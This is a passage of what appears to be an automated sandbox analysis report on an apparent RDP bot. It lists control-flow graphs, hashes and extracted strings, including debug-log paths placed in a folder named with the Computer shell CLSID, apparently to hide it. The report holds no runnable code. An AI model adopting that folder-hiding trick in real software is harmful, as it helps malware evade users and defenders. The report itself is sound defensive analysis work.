731->732 733 7ffe0e1614bd-7ffe0e1614c0 731->733 743 7ffe0e1614f8-7ffe0e161541 strlen fopen 732->743 744 7ffe0e1614d8-7ffe0e1614f2 strcat strlen 732->744 733->732 740 7ffe0e1614c2-7ffe0e1614cf strlen 733->740 741 7ffe0e1616c3-7ffe0e1616c8 734->741 742 7ffe0e1615fe-7ffe0e161604 734->742 735->730 737->730 746 7ffe0e16161a-7ffe0e16161d 738->746 747 7ffe0e161687 738->747 748 7ffe0e161635-7ffe0e16163a 739->748 749 7ffe0e1616af 739->749 740->732 741->730 750 7ffe0e16163f-7ffe0e161644 742->750 751 7ffe0e161606-7ffe0e16160b 742->751 752 7ffe0e16165d-7ffe0e161678 call 7ffe0e161292 743->752 753 7ffe0e161547-7ffe0e161563 call 7ffe0e161292 743->753 744->743 746->737 754 7ffe0e161623-7ffe0e161628 746->754 747->723 748->730 749->735 750->730 751->730 752->730 753->730 759 7ffe0e1616cd-7ffe0e1616e7 call 7ffe0e161292 753->759 754->730 759->745
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                  • API String ID: 3395718042-1297835036
                  • Opcode ID: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
                  • Instruction ID: 2b1b7227dc494e42412e9eb230d652b9badbfd2ec09cbc4242d57d9e97602156
                  • Opcode Fuzzy Hash: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
                  • Instruction Fuzzy Hash: 6A517A90F0D717A5FB209B15B8803BC6365AF46B88F944433D9DE166B3DE6CB946C381

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 860 7ffe11ec317c-7ffe11ec31a4 InitializeCriticalSectionAndSpinCount 861 7ffe11ec31aa-7ffe11ec31de call 7ffe11ec1e40 call 7ffe11ec7dd1 860->861 862 7ffe11ec32d0-7ffe11ec32f1 GetLastError call 7ffe11ec2fd2 860->862 875 7ffe11ec32a9-7ffe11ec32c1 call 7ffe11ec2fd2 861->875 876 7ffe11ec31e4-7ffe11ec31fb strlen 861->876 868 7ffe11ec32f3 862->868 869 7ffe11ec3312-7ffe11ec3318 862->869 871 7ffe11ec32f9-7ffe11ec3306 868->871 872 7ffe11ec33d1-7ffe11ec33d6 868->872 873 7ffe11ec33db 869->873 874 7ffe11ec331e-7ffe11ec3324 869->874 871->869 872->875 883 7ffe11ec33e5-7ffe11ec33ea 873->883 877 7ffe11ec3326-7ffe11ec332c 874->877 878 7ffe11ec3350-7ffe11ec3353 874->878 896 7ffe11ec32c6-7ffe11ec32cf 875->896 879 7ffe11ec31fd-7ffe11ec3200 876->879 880 7ffe11ec3213-7ffe11ec3216 876->880 881 7ffe11ec33f9-7ffe11ec33fe 877->881 882 7ffe11ec3332-7ffe11ec3338 877->882 884 7ffe11ec336d-7ffe11ec3373 878->884 885 7ffe11ec3355-7ffe11ec3358 878->885 879->880 889 7ffe11ec3202-7ffe11ec320f strlen 879->889 890 7ffe11ec3238-7ffe11ec3281 strlen fopen 880->890 891 7ffe11ec3218-7ffe11ec3232 strcat strlen 880->891 881->875 892 7ffe11ec333e-7ffe11ec3344 882->892 893 7ffe11ec3403-7ffe11ec3408 882->893 883->875 887 7ffe11ec33ef 884->887 888 7ffe11ec3375-7ffe11ec337a 884->888 894 7ffe11ec33c7 885->894 895 7ffe11ec335a-7ffe11ec335d 885->895 887->881 888->875 889->880 897 7ffe11ec3287-7ffe11ec32a3 call 7ffe11ec2fd2 890->897 898 7ffe11ec339d-7ffe11ec33b8 call 7ffe11ec2fd2 890->898 891->890 899 7ffe11ec3346-7ffe11ec334b 892->899 900 7ffe11ec337f-7ffe11ec3384 892->900 893->875 894->872 895->883 901 7ffe11ec3363-7ffe11ec3368 895->901 897->875 906 7ffe11ec340d-7ffe11ec3427 call 7ffe11ec2fd2 897->906 898->875 899->875 900->875 901->875 906->896
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                  • API String ID: 3395718042-2859552336
                  • Opcode ID: d866d4520e6646e688fe6c53166ec7f3a941c848705e6ec98f60068003c99dcc
                  • Instruction ID: 8c6f1a03077aef74dba148bdcb050621d7b3318932e94cdef84df5b1056fdccf
                  • Opcode Fuzzy Hash: d866d4520e6646e688fe6c53166ec7f3a941c848705e6ec98f60068003c99dcc
                  • Instruction Fuzzy Hash: 6E514E10E1CF0782FF245BD7AC843BB1259AF45774F9450B2C90E062B2EE6DBA86D741

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1097 7ffe11508702-7ffe11508725 1098 7ffe115087ba-7ffe115087e8 call 7ffe11501292 1097->1098 1099 7ffe1150872b-7ffe1150872e 1097->1099 1110 7ffe115089d3-7ffe115089e0 1098->1110 1100 7ffe11508734-7ffe11508737 1099->1100 1101 7ffe115087ed-7ffe1150881b call 7ffe11501292 1099->1101 1103 7ffe11508820-7ffe1150884e call 7ffe11501292 1100->1103 1104 7ffe1150873d-7ffe11508740 1100->1104 1101->1110 1103->1110 1108 7ffe11508853-7ffe11508881 call 7ffe11501292 1104->1108 1109 7ffe11508746-7ffe11508767 RegOpenKeyExA 1104->1109 1108->1110 1113 7ffe11508886-7ffe115088ae RegQueryValueExA 1109->1113 1114 7ffe1150876d-7ffe1150878e call 7ffe11501292 1109->1114 1116 7ffe11508b81-7ffe11508b83 1110->1116 1117 7ffe115089e6 1110->1117 1121 7ffe115089c3 1113->1121 1122 7ffe115088b4-7ffe115088b7 1113->1122 1132 7ffe11508794-7ffe11508797 1114->1132 1133 7ffe11508ab7-7ffe11508abe 1114->1133 1120 7ffe115089ee-7ffe115089f8 1116->1120 1123 7ffe11508b89-7ffe11508ba2 call 7ffe11501292 1116->1123 1117->1120 1126 7ffe115089fe-7ffe11508a01 1120->1126 1127 7ffe11508bac 1120->1127 1124 7ffe115089c8-7ffe115089cd RegCloseKey 1121->1124 1128 7ffe115088fe-7ffe11508905 1122->1128 1129 7ffe115088b9 1122->1129 1136 7ffe11508ba7 1123->1136 1124->1110 1134 7ffe11508a07-7ffe11508a24 call 7ffe11501292 1126->1134 1135 7ffe11508bb8 1126->1135 1127->1135 1131 7ffe115088bc-7ffe115088e1 call 7ffe11501292 1128->1131 1129->1131 1155 7ffe115088e3-7ffe115088e5 1131->1155 1156 7ffe1150893b-7ffe11508941 1131->1156 1139 7ffe11508a82-7ffe11508a89 1132->1139 1140 7ffe1150879d-7ffe115087a1 1132->1140 1137 7ffe11508ac0 1133->1137 1138 7ffe11508b3b-7ffe11508b40 1133->1138 1143 7ffe11508a29-7ffe11508a37 1134->1143 1136->1143 1146 7ffe11508ac2-7ffe11508ac6 1137->1146 1147 7ffe11508aec-7ffe11508af3 1137->1147 1138->1110 1144 7ffe11508a8f-7ffe11508a94 1139->1144 1145 7ffe11508b1d-7ffe11508b22 1139->1145 1148 7ffe115087a7-7ffe115087b5 1140->1148 1149 7ffe11508aad-7ffe11508ab2 1140->1149 1144->1110 1145->1110 1151 7ffe11508b45-7ffe11508b4a 1146->1151 1152 7ffe11508ac8 1146->1152 1153 7ffe11508af5 1147->1153 1154 7ffe11508b59-7ffe11508b5e 1147->1154 1148->1098 1149->1110 1151->1110 1159 7ffe11508ace-7ffe11508ad6 1152->1159 1160 7ffe11508b4f-7ffe11508b54 1152->1160 1161 7ffe11508b63-7ffe11508b68 1153->1161 1162 7ffe11508af7-7ffe11508afe 1153->1162 1154->1110 1163 7ffe11508907-7ffe1150890d 1155->1163 1164 7ffe115088e7-7ffe115088ea 1155->1164 1157 7ffe11508a3f-7ffe11508a44 1156->1157 1158 7ffe11508947-7ffe1150894d 1156->1158 1157->1124 1167 7ffe1150894f-7ffe11508952 1158->1167 1168 7ffe11508977-7ffe1150897d 1158->1168 1169 7ffe11508ae2-7ffe11508ae7 1159->1169 1170 7ffe11508ad8-7ffe11508add 1159->1170 1160->1110 1161->1110 1171 7ffe11508b00-7ffe11508b07 1162->1171 1172 7ffe11508b6d-7ffe11508b72 1162->1172 1165 7ffe11508913-7ffe11508918 1163->1165 1166 7ffe115089b5-7ffe115089ba 1163->1166 1173 7ffe11508931-7ffe11508936 1164->1173 1174 7ffe115088ec-7ffe115088f9 1164->1174 1165->1124 1166->1124 1175 7ffe11508a46-7ffe11508a4b 1167->1175 1176 7ffe11508958-7ffe1150895b 1167->1176 1177 7ffe11508983-7ffe11508989 1168->1177 1178 7ffe11508a5a-7ffe11508a5f 1168->1178 1169->1110 1170->1110 1179 7ffe11508b77-7ffe11508b7c 1171->1179 1180 7ffe11508b09-7ffe11508b0e 1171->1180 1172->1110 1173->1124 1174->1128 1175->1124 1181 7ffe11508a50-7ffe11508a55 1176->1181 1182 7ffe11508961-7ffe11508967 1176->1182 1183 7ffe1150898f-7ffe11508995 1177->1183 1184 7ffe11508a64-7ffe11508a69 1177->1184 1178->1124 1179->1110 1180->1110 1181->1124 1185 7ffe11508970-7ffe11508975 1182->1185 1186 7ffe11508969-7ffe1150896e 1182->1186 1187 7ffe11508a6e-7ffe11508a73 1183->1187 1188 7ffe1150899b-7ffe115089a1 1183->1188 1184->1124 1185->1124 1186->1124 1187->1124 1189 7ffe115089a7-7ffe115089ac 1188->1189 1190 7ffe11508a78-7ffe11508a7d 1188->1190 1189->1124 1190->1124
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: OpenQueryValuefflushfwrite
                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                  • API String ID: 1980715187-354652506
                  • Opcode ID: 10e2f2bcc86c5db24003d7257f55d133fe8bf5ec320687aeaeab675f932333e7
                  • Instruction ID: 213b15b1b6d8173aa771f3a70e0b745a70e7920eb6db43ec3232965a47101512
                  • Opcode Fuzzy Hash: 10e2f2bcc86c5db24003d7257f55d133fe8bf5ec320687aeaeab675f932333e7
                  • Instruction Fuzzy Hash: 6CA14B60D0CF0B91F721AB87A840BBD225DAF00774E5405BAD94E467B5EFADE985D303

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1003 7ffe0eb42472-7ffe0eb42495 1004 7ffe0eb4249b-7ffe0eb4249e 1003->1004 1005 7ffe0eb4252a-7ffe0eb42558 call 7ffe0eb41292 1003->1005 1007 7ffe0eb424a4-7ffe0eb424a7 1004->1007 1008 7ffe0eb4255d-7ffe0eb4258b call 7ffe0eb41292 1004->1008 1013 7ffe0eb42743-7ffe0eb42750 1005->1013 1011 7ffe0eb42590-7ffe0eb425be call 7ffe0eb41292 1007->1011 1012 7ffe0eb424ad-7ffe0eb424b0 1007->1012 1008->1013 1011->1013 1016 7ffe0eb425c3-7ffe0eb425f1 call 7ffe0eb41292 1012->1016 1017 7ffe0eb424b6-7ffe0eb424d7 RegOpenKeyExA 1012->1017 1018 7ffe0eb428f1-7ffe0eb428f3 1013->1018 1019 7ffe0eb42756 1013->1019 1016->1013 1021 7ffe0eb425f6-7ffe0eb4261e RegQueryValueExA 1017->1021 1022 7ffe0eb424dd-7ffe0eb424fe call 7ffe0eb41292 1017->1022 1024 7ffe0eb4275e-7ffe0eb42768 1018->1024 1025 7ffe0eb428f9-7ffe0eb42912 call 7ffe0eb41292 1018->1025 1019->1024 1028 7ffe0eb42624-7ffe0eb42627 1021->1028 1029 7ffe0eb42733 1021->1029 1041 7ffe0eb42504-7ffe0eb42507 1022->1041 1042 7ffe0eb42827-7ffe0eb4282e 1022->1042 1032 7ffe0eb4276e-7ffe0eb42771 1024->1032 1033 7ffe0eb4291c 1024->1033 1038 7ffe0eb42917 1025->1038 1035 7ffe0eb4266e-7ffe0eb42675 1028->1035 1036 7ffe0eb42629 1028->1036 1031 7ffe0eb42738-7ffe0eb4273d RegCloseKey 1029->1031 1031->1013 1039 7ffe0eb42928 1032->1039 1040 7ffe0eb42777-7ffe0eb42794 call 7ffe0eb41292 1032->1040 1033->1039 1037 7ffe0eb4262c-7ffe0eb42651 call 7ffe0eb41292 1035->1037 1036->1037 1057 7ffe0eb42653-7ffe0eb42655 1037->1057 1058 7ffe0eb426ab-7ffe0eb426b1 1037->1058 1045 7ffe0eb42799-7ffe0eb427a7 1038->1045 1040->1045 1047 7ffe0eb427f2-7ffe0eb427f9 1041->1047 1048 7ffe0eb4250d-7ffe0eb42511 1041->1048 1043 7ffe0eb42830 1042->1043 1044 7ffe0eb428ab-7ffe0eb428b0 1042->1044 1051 7ffe0eb42832-7ffe0eb42836 1043->1051 1052 7ffe0eb4285c-7ffe0eb42863 1043->1052 1044->1013 1055 7ffe0eb427ff-7ffe0eb42804 1047->1055 1056 7ffe0eb4288d-7ffe0eb42892 1047->1056 1053 7ffe0eb42517-7ffe0eb42525 1048->1053 1054 7ffe0eb4281d-7ffe0eb42822 1048->1054 1059 7ffe0eb428b5-7ffe0eb428ba 1051->1059 1060 7ffe0eb42838 1051->1060 1061 7ffe0eb42865 1052->1061 1062 7ffe0eb428c9-7ffe0eb428ce 1052->1062 1053->1005 1054->1013 1055->1013 1056->1013 1063 7ffe0eb42677-7ffe0eb4267d 1057->1063 1064 7ffe0eb42657-7ffe0eb4265a 1057->1064 1067 7ffe0eb427af-7ffe0eb427b4 1058->1067 1068 7ffe0eb426b7-7ffe0eb426bd 1058->1068 1059->1013 1065 7ffe0eb428bf-7ffe0eb428c4 1060->1065 1066 7ffe0eb4283e-7ffe0eb42846 1060->1066 1069 7ffe0eb428d3-7ffe0eb428d8 1061->1069 1070 7ffe0eb42867-7ffe0eb4286e 1061->1070 1062->1013 1075 7ffe0eb42725-7ffe0eb4272a 1063->1075 1076 7ffe0eb42683-7ffe0eb42688 1063->1076 1071 7ffe0eb426a1-7ffe0eb426a6 1064->1071 1072 7ffe0eb4265c-7ffe0eb42669 1064->1072 1065->1013 1073 7ffe0eb42852-7ffe0eb42857 1066->1073 1074 7ffe0eb42848-7ffe0eb4284d 1066->1074 1067->1031 1077 7ffe0eb426bf-7ffe0eb426c2 1068->1077 1078 7ffe0eb426e7-7ffe0eb426ed 1068->1078 1069->1013 1079 7ffe0eb42870-7ffe0eb42877 1070->1079 1080 7ffe0eb428dd-7ffe0eb428e2 1070->1080 1071->1031 1072->1035 1073->1013 1074->1013 1075->1031 1076->1031 1083 7ffe0eb426c8-7ffe0eb426cb 1077->1083 1084 7ffe0eb427b6-7ffe0eb427bb 1077->1084 1081 7ffe0eb426f3-7ffe0eb426f9 1078->1081 1082 7ffe0eb427ca-7ffe0eb427cf 1078->1082 1085 7ffe0eb42879-7ffe0eb4287e 1079->1085 1086 7ffe0eb428e7-7ffe0eb428ec 1079->1086 1080->1013 1087 7ffe0eb426ff-7ffe0eb42705 1081->1087 1088 7ffe0eb427d4-7ffe0eb427d9 1081->1088 1082->1031 1089 7ffe0eb426d1-7ffe0eb426d7 1083->1089 1090 7ffe0eb427c0-7ffe0eb427c5 1083->1090 1084->1031 1085->1013 1086->1013 1091 7ffe0eb427de-7ffe0eb427e3 1087->1091 1092 7ffe0eb4270b-7ffe0eb42711 1087->1092 1088->1031 1093 7ffe0eb426e0-7ffe0eb426e5 1089->1093 1094 7ffe0eb426d9-7ffe0eb426de 1089->1094 1090->1031 1091->1031 1095 7ffe0eb427e8-7ffe0eb427ed 1092->1095 1096 7ffe0eb42717-7ffe0eb4271c 1092->1096 1093->1031 1094->1031 1095->1031 1096->1031
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: OpenQueryValuefflushfwrite
                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                  • API String ID: 1980715187-354652506
                  • Opcode ID: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
                  • Instruction ID: 2667aeca55bc9b5327690d97f469b3a4314182f243a021d48afd402c142183d7
                  • Opcode Fuzzy Hash: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
                  • Instruction Fuzzy Hash: 1BA14CA5E0C74B81FA709F44A8403B87354EF04744F940132EADE466B9EE6DEE85EF42

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 909 7ffe0e16b0e2-7ffe0e16b105 910 7ffe0e16b19a-7ffe0e16b1c8 call 7ffe0e161292 909->910 911 7ffe0e16b10b-7ffe0e16b10e 909->911 919 7ffe0e16b3b3-7ffe0e16b3c0 910->919 913 7ffe0e16b114-7ffe0e16b117 911->913 914 7ffe0e16b1cd-7ffe0e16b1fb call 7ffe0e161292 911->914 917 7ffe0e16b200-7ffe0e16b22e call 7ffe0e161292 913->917 918 7ffe0e16b11d-7ffe0e16b120 913->918 914->919 917->919 922 7ffe0e16b233-7ffe0e16b261 call 7ffe0e161292 918->922 923 7ffe0e16b126-7ffe0e16b147 RegOpenKeyExA 918->923 927 7ffe0e16b561-7ffe0e16b563 919->927 928 7ffe0e16b3c6 919->928 922->919 924 7ffe0e16b14d-7ffe0e16b16e call 7ffe0e161292 923->924 925 7ffe0e16b266-7ffe0e16b28e RegQueryValueExA 923->925 944 7ffe0e16b174-7ffe0e16b177 924->944 945 7ffe0e16b497-7ffe0e16b49e 924->945 932 7ffe0e16b294-7ffe0e16b297 925->932 933 7ffe0e16b3a3 925->933 934 7ffe0e16b3ce-7ffe0e16b3d8 927->934 935 7ffe0e16b569-7ffe0e16b582 call 7ffe0e161292 927->935 928->934 937 7ffe0e16b2de-7ffe0e16b2e5 932->937 938 7ffe0e16b299 932->938 941 7ffe0e16b3a8-7ffe0e16b3ad RegCloseKey 933->941 939 7ffe0e16b3de-7ffe0e16b3e1 934->939 940 7ffe0e16b58c 934->940 943 7ffe0e16b587 935->943 946 7ffe0e16b29c-7ffe0e16b2c1 call 7ffe0e161292 937->946 938->946 947 7ffe0e16b598 939->947 948 7ffe0e16b3e7-7ffe0e16b404 call 7ffe0e161292 939->948 940->947 941->919 949 7ffe0e16b409-7ffe0e16b417 943->949 950 7ffe0e16b462-7ffe0e16b469 944->950 951 7ffe0e16b17d-7ffe0e16b181 944->951 954 7ffe0e16b4a0 945->954 955 7ffe0e16b51b-7ffe0e16b520 945->955 965 7ffe0e16b2c3-7ffe0e16b2c5 946->965 966 7ffe0e16b31b-7ffe0e16b321 946->966 948->949 958 7ffe0e16b46f-7ffe0e16b474 950->958 959 7ffe0e16b4fd-7ffe0e16b502 950->959 956 7ffe0e16b48d-7ffe0e16b492 951->956 957 7ffe0e16b187-7ffe0e16b195 951->957 961 7ffe0e16b4a2-7ffe0e16b4a6 954->961 962 7ffe0e16b4cc-7ffe0e16b4d3 954->962 955->919 956->919 957->910 958->919 959->919 967 7ffe0e16b525-7ffe0e16b52a 961->967 968 7ffe0e16b4a8 961->968 963 7ffe0e16b4d5 962->963 964 7ffe0e16b539-7ffe0e16b53e 962->964 969 7ffe0e16b543-7ffe0e16b548 963->969 970 7ffe0e16b4d7-7ffe0e16b4de 963->970 964->919 973 7ffe0e16b2e7-7ffe0e16b2ed 965->973 974 7ffe0e16b2c7-7ffe0e16b2ca 965->974 971 7ffe0e16b41f-7ffe0e16b424 966->971 972 7ffe0e16b327-7ffe0e16b32d 966->972 967->919 975 7ffe0e16b4ae-7ffe0e16b4b6 968->975 976 7ffe0e16b52f-7ffe0e16b534 968->976 969->919 977 7ffe0e16b4e0-7ffe0e16b4e7 970->977 978 7ffe0e16b54d-7ffe0e16b552 970->978 971->941 979 7ffe0e16b32f-7ffe0e16b332 972->979 980 7ffe0e16b357-7ffe0e16b35d 972->980 985 7ffe0e16b395-7ffe0e16b39a 973->985 986 7ffe0e16b2f3-7ffe0e16b2f8 973->986 981 7ffe0e16b311-7ffe0e16b316 974->981 982 7ffe0e16b2cc-7ffe0e16b2d9 974->982 983 7ffe0e16b4c2-7ffe0e16b4c7 975->983 984 7ffe0e16b4b8-7ffe0e16b4bd 975->984 976->919 987 7ffe0e16b4e9-7ffe0e16b4ee 977->987 988 7ffe0e16b557-7ffe0e16b55c 977->988 978->919 989 7ffe0e16b338-7ffe0e16b33b 979->989 990 7ffe0e16b426-7ffe0e16b42b 979->990 991 7ffe0e16b363-7ffe0e16b369 980->991 992 7ffe0e16b43a-7ffe0e16b43f 980->992 981->941 982->937 983->919 984->919 985->941 986->941 987->919 988->919 993 7ffe0e16b430-7ffe0e16b435 989->993 994 7ffe0e16b341-7ffe0e16b347 989->994 990->941 995 7ffe0e16b444-7ffe0e16b449 991->995 996 7ffe0e16b36f-7ffe0e16b375 991->996 992->941 993->941 997 7ffe0e16b350-7ffe0e16b355 994->997 998 7ffe0e16b349-7ffe0e16b34e 994->998 995->941 999 7ffe0e16b44e-7ffe0e16b453 996->999 1000 7ffe0e16b37b-7ffe0e16b381 996->1000 997->941 998->941 999->941 1001 7ffe0e16b458-7ffe0e16b45d 1000->1001 1002 7ffe0e16b387-7ffe0e16b38c 1000->1002 1001->941 1002->941
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: OpenQueryValuefflushfwrite
                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                  • API String ID: 1980715187-354652506
                  • Opcode ID: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
                  • Instruction ID: e0be538e72c5d9ca48400dccdab6c26f61b90234eaf67667fe3a28693ca64aa8
                  • Opcode Fuzzy Hash: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
                  • Instruction Fuzzy Hash: 6CA15E60E0C75B82FB349B00A944BB93260AF54788F540137DADE867B7EF6DE985C342

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1191 7ffe11ec9702-7ffe11ec9725 1192 7ffe11ec97ba-7ffe11ec97e8 call 7ffe11ec2fd2 1191->1192 1193 7ffe11ec972b-7ffe11ec972e 1191->1193 1201 7ffe11ec99d3-7ffe11ec99e0 1192->1201 1195 7ffe11ec97ed-7ffe11ec981b call 7ffe11ec2fd2 1193->1195 1196 7ffe11ec9734-7ffe11ec9737 1193->1196 1195->1201 1199 7ffe11ec973d-7ffe11ec9740 1196->1199 1200 7ffe11ec9820-7ffe11ec984e call 7ffe11ec2fd2 1196->1200 1204 7ffe11ec9746-7ffe11ec9767 RegOpenKeyExA 1199->1204 1205 7ffe11ec9853-7ffe11ec9881 call 7ffe11ec2fd2 1199->1205 1200->1201 1209 7ffe11ec99e6 1201->1209 1210 7ffe11ec9b81-7ffe11ec9b83 1201->1210 1207 7ffe11ec976d-7ffe11ec978e call 7ffe11ec2fd2 1204->1207 1208 7ffe11ec9886-7ffe11ec98ae RegQueryValueExA 1204->1208 1205->1201 1227 7ffe11ec9ab7-7ffe11ec9abe 1207->1227 1228 7ffe11ec9794-7ffe11ec9797 1207->1228 1215 7ffe11ec99c3 1208->1215 1216 7ffe11ec98b4-7ffe11ec98b7 1208->1216 1213 7ffe11ec99ee-7ffe11ec99f8 1209->1213 1210->1213 1217 7ffe11ec9b89-7ffe11ec9ba2 call 7ffe11ec2fd2 1210->1217 1221 7ffe11ec9bac 1213->1221 1222 7ffe11ec99fe-7ffe11ec9a01 1213->1222 1219 7ffe11ec99c8-7ffe11ec99cd RegCloseKey 1215->1219 1223 7ffe11ec98b9 1216->1223 1224 7ffe11ec98fe-7ffe11ec9905 1216->1224 1225 7ffe11ec9ba7 1217->1225 1219->1201 1230 7ffe11ec9bb8 